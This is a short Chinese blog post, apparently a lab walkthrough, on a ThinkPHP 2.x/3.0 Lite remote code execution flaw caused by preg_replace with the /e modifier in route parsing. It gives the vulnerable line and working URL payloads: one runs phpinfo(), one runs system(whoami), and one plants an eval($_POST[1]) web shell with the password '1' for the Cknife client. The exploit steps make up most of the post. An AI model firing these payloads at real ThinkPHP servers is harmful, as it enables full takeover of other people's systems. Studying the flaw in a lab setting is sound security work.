ThinkPHP 2.x 任意代码执行漏洞

ThinkPHP 2.x版本中，使用preg_replace的/e模式匹配路由：

$res = preg_replace('@(\w+)'.$depr.'([^'.$depr.'\/]+)@e', '$var[\'\\1\']="\\2";', implode($depr,$paths));

导致用户的输入参数被插入双引号中执行，造成任意代码执行漏洞。

ThinkPHP 3.0版本因为Lite模式下没有修复该漏洞，也存在这个漏洞。

环境搭建

执行如下命令启动ThinkPHP 2.1的Demo应用：

docker-compose up -d

环境启动后，访问http://your-ip:8080/即可查看到默认页面。

直接访问http://your-ip:8080/index.php?s=/index/index/name/$%7B@phpinfo()%7D即可执行phpinfo()：

任意代码执行

payload：

/index.php?s=/index/index/xxx/${system(whoami)}

Cknife连接，连接密码：1

http://192.168.10.128:8080//index.php?s=a/b/c/${@print(eval($_POST[1]))}

posted @ 2022-05-18 08:51 NoCirc1e 阅读(178) 评论(0) 编辑收藏举报

刷新页面返回顶部

登录后才能查看或发表评论，立即登录或者逛逛博客园首页

相关博文：

· Discuz 7.x/6.x 全局变量防御绕过导致代码执行

· ThinkPHP 2.x 任意代码执行漏洞

阅读排行：
· TypeScript + Deepseek 打造卜卦网站：技术与玄学的结合
· 阿里巴巴 QwQ-32B真的超越了 DeepSeek R-1吗？
· 【译】Visual Studio 中新的强大生产力特性
· 【设计模式】告别冗长if-else语句：使用策略模式优化代码结构
· 10年+ .NET Coder 心语 ── 封装的思维：从隐藏、稳定开始理解其本质意义

昵称： NoCirc1e
园龄： 4年3个月
粉丝： 20
关注： 8

2025年3月

日

一

二

三

四

五

六